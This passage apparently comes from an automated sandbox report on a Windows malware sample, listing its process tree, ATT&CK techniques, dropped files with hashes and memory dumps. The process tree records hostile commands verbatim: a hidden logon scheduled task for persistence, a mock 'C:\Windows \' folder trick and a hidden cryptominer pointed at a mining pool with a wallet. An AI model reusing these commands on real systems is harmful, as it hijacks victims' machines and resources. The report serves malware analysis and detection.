"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
4⤵
PID:1164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\VCRedists')
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3868

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RR7XQNc8dKLtgQouBpDVpnVyh2AvUBCjXJ.RIG_CPU -p x --cpu-max-threads-hint=50
4⤵
- Suspicious use of FindShellTrayWindow
PID:4528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

File and Directory Discovery

T1083

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
561ad4794e22ab68a6811d88e43d6c06

SHA1
3dcd045d3e0fb917c67ec36cfe102e50a9b3c41c

SHA256
250e7bac495dbd6e656b75106b03b7e741c7508097fbd32cf78627061b7ceade

SHA512
00273fa6bf017c674a48e3b9b4757f083540846de66abf8c2b8fc878d38475cf284f3ebefc597600a393ec18c8027a6628e6698ab5a3086fe60e1aa6ef733c96

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
05c5e512c52489e049a31b0782ac637e

SHA1
a487b01aaa7c6eebeee912054c290a8c2583ce7a

SHA256
a2bc8188c46c2814998421224b07adedb7a381e691b271ff71cb96500b418fbe

SHA512
946887631bc23ac243c9ead0def5989bd73d813778f09b3c8e43e05a13ac55f3b9fb16ecef17b0b397d41385c84ea5d30c3b194b49b628ddf9a9c74fd8166650

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
97748f71ed95026706014e8524266292

SHA1
f60663ea2e2a778c57d07d9678fe04c79c3ff942

SHA256
f1320df712bf0d218f62a481ea318abfaba12a6465f9d2e07a6ead9d9bd28d9f

SHA512
b6df8e3eea09cdd6964bb7801a615df38a3043a2961176ec275fef531a8378fd0d21ee96d01165d192b32d0eddc021ad82fa609ab216005a60bf42b79e1e86c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a23367bfc7bcc2e267fe31a25f44beae

SHA1
f60276f35f85892f4c03feb73c305bd124604a6e

SHA256
c7835e80b42b0dfb299436cca04d4226db5a3ae4d991e5d1b5570e20a03f088d

SHA512
22b871e64a6543fad4da3477d3789cd3939a28702665c928b8fd1e0770c61c1ac6b0ac23aaf411b4368c1ccce99ac65ea34ed23aa922447b3da661cabc8fdee8

Download Submit
C:\Users\Admin\AppData\Local\Temp\MLANG.dll

Filesize
122KB

MD5
0b62c554572e9d2dfc51b6367c34700f

SHA1
1a41693552101c650aeeffe9dc9f1c7f7553dd7b

SHA256
b05a80ef8ad197ee36620655100e1fd4111ec946a9f012970da4c61d8da43ded

SHA512
765e2f686a74804063b1face147a2dfd4cac85fb8273b5b0ccbd7606e46fce9865d5bbeeca40af31a8b584dc0bba1ebc0ff3fa8c1993da08a4b09cd15a394ce9

Download Submit
C:\Users\Admin\AppData\Local\Temp\VCRedist.bat

Filesize
413KB

MD5
1dfa0a2035388952e2b5c841dfc5f595

SHA1
636cc89f8d661960324de4047f4281a6eb8ca37b

SHA256
db117c7378bc5ac4c6acc296d07ce799d1bb4a12fac593c16c34e7ccc9d4fa6c

SHA512
6b1e7579c432743e4b7927835f02401341ce9fbc26f8f7edecbe95a1bb00c139ae392543d5603fe042c0b76beb1269a6168f1bb72ab6407ca1c505677059a320

Download Submit
C:\Users\Admin\AppData\Local\Temp\VCRedists.bat

Filesize
972KB

MD5
c86637644022012aaa6bbfbf8947f3a6

SHA1
94adf42f7d2a48be6ee33900596f918fc4d6c36d

SHA256
1253081538d614b09657b82e17be73f15a63bef1ac1c5d5383624954e0776f41

SHA512
df80a94d7fcc1276b60849320ca530b6a5e11f4bfe7aaf816975d6aa0412c046c44df22e2d8914bd26076e698c70ce81adf1cb5c535ba76620b216c1955173e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sfyp1nub.ejs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows \System32\ComputerDefaults.exe

Filesize
80KB

MD5
d25a9e160e3b74ef2242023726f15416

SHA1
27a9bb9d7628d442f9b5cf47711c906e3315755b

SHA256
7b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c

SHA512
bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910

Download Submit
memory/4056-82-0x00007FFBA1F50000-0x00007FFBA2145000-memory.dmp

Filesize
2.0MB

Download
memory/4056-83-0x00007FFBA1400000-0x00007FFBA14BE000-memory.dmp

Filesize
760KB

Download
memory/4116-141-0x0000016DB50A0000-0x0000016DB51A4000-memory.dmp

Filesize
1.0MB

Download
memory/4116-25-0x0000016DB4A80000-0x0000016DB4AC4000-memory.dmp

Filesize
272KB

Download
memory/4116-143-0x0000016DB5240000-0x0000016DB528C000-memory.dmp

Filesize
304KB

Download
memory/4116-33-0x00007FFBA1400000-0x00007FFBA14BE000-memory.dmp

Filesize
760KB

Download
memory/4116-32-0x00007FFBA1F50000-0x00007FFBA2145000-memory.dmp

Filesize
2.0MB

Download
memory/4116-31-0x0000016DB46D0000-0x0000016DB46E0000-memory.dmp

Filesize
64KB

Download
memory/4116-34-0x0000016DB4E90000-0x0000016DB4F48000-memory.dmp

Filesize
736KB

Download
memory/4116-142-0x0000016DB51E0000-0x0000016DB5236000-memory.dmp

Filesize
344KB

Download
memory/4116-6-0x0000016DB4570000-0x0000016DB4592000-memory.dmp

Filesize
136KB

Download
memory/4116-140-0x0000016DB5000000-0x0000016DB50A2000-memory.dmp

Filesize
648KB

Download
memory/4116-26-0x0000016DB4B50000-0x0000016DB4BC6000-memory.dmp

Filesize
472KB

Download
memory/4196-30-0x00000204F8610000-0x00000204F865E000-memory.dmp

Filesize
312KB

Download
memory/4196-27-0x00000204F5FB0000-0x00000204F5FC0000-memory.dmp

Filesize
64KB

Download
memory/4196-29-0x00007FFBA1400000-0x00007FFBA14BE000-memory.dmp

Filesize
760KB

Download
memory/4196-28-0x00007FFBA1F50000-0x00007FFBA2145000-memory.dmp

Filesize
2.0MB

Download
memory/4196-56-0x00000204F8AD0000-0x00000204F8AE8000-memory.dmp

Filesize
96KB

Download
memory/4528-146-0x00000268DFCE0000-0x00000268DFD00000-memory.dmp

Filesize
128KB

Download
memory/4528-145-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/4528-144-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/4528-148-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/4528-150-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/4528-151-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/4528-149-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/4528-147-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download